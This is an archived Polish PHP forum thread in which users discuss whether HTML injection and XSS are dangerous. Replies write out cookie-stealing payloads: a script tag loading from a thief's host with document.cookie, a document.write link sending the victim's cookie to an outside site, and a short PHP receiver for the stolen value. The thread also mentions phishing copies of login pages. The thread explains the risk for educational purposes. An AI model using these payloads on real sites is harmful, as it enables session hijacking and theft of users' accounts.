Forum PHP.pl > Html injection - czy może być naprawdę groźne.

Pomoc - Szukaj - Użytkownicy - Kalendarz

Pełna wersja: Html injection - czy może być naprawdę groźne.

Lk_hc

12.12.2008, 15:50:27

Html injection - czy może być naprawdę groźne, jeśli założymy, że zachodzi tylko na danych wyświetlanych jednemu użytkownikowi, tymczasowo (np zapytanie do szukarki). Oczywiste jest że jest destruktywne na forach czy systemach komentarzy bo szpeci, ale czy może być groźne dla serwera / aplikacji?

Riklaunim

12.12.2008, 15:56:34

tak, można wykraść cookie usera - np. admina

Lk_hc

12.12.2008, 16:05:28

A to nie jest tak że alertnąć można tylko swoje cookie?

wookieb

12.12.2008, 16:09:13

A jak ktoś sobie zrobi <script src="http://adres_zlodziej.pl/scirpt?c=document.cookie"></script>
to będzie miał cookie tej osoby ktora otworzy strone.

Lk_hc

12.12.2008, 16:17:26

No tak - to zadziała w przypadku forów, komentarzy itd lub jeśli wstrzyknięcie kodu zachodzi przez GET i debil, któremu podeśle się odpowiednio spreparowany URL w niego kliknie. A da się poprzez HTML injection wywołać w jakiś sposób PHP jeśli jest escapowane albo zapodać plik na serwer?

Riklaunim

12.12.2008, 16:56:57

Ogólnie jeżeli twój kod jest podatny na XSS to jego wartość jest zerowa - niezależnie czy tobie wydaje się że to może być "niegroźne"

Lk_hc

19.12.2008, 15:35:07

No jasne, że zerowa. Dlatego nie pisze takiego kodu

Crozin

19.12.2008, 17:29:31

Bardzo prosto jest zmylić kogoś, by kliknął w link, któremu uwać nie powinien:

Kod

wejdź na <script type="text/javascript">document.write('<a href="http://mojaStrona.pl/?c=' + escape(document.cookie) + '">http://forum.php.pl/e_t109179.html</a>');</script> i poszukaj...

Przy czym na mojaStrona.pl może dojść do zapisania danych i przekierowania na Temat: e aby ofiara nawet nie była świadoma, że coś jest nie tak. Równie dobrze można też wyświetlić identyczną stronę (jak docelowa), ale wszystkie dane wprowadzone przez użytkownika zapisywać (loginy, hasła itp.)

in5ane

19.12.2008, 17:42:40

Trochę nie na temat, ale jak np. odczytać takie COOKIE na stronie złodzieja? Czyli jaki skrypt przechwytujący takie dane?

Crozin

19.12.2008, 18:37:41

Jeżeli "zły" link wygląda tak jak ten mój post wyżej to na mojastrona.pl w pliku index.php wystarczy to odebrać poprzez

[PHP] pobierz, plaintext 
<?php
$cookies = $_GET['c'];
?>
[PHP] pobierz, plaintext

Oczywiście trzeba jeszcze to odpowiednio przetworzyć, aby otrzymać z tego coś na kształt tablicy $_COOKIE z PHP.

bełdzio

19.12.2008, 20:58:14

tu byłem ;-)

http://www.beldzio.com/niebezpieczenstwo-htmla

piotrooo89

19.12.2008, 21:15:05

a jeszcze warto wspomnieć o spam botach które wykorzystują maile na stronie do wysyłania spamu jeśli adres jest nieodpowiednio zdefiniowany. tu coś o tym

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.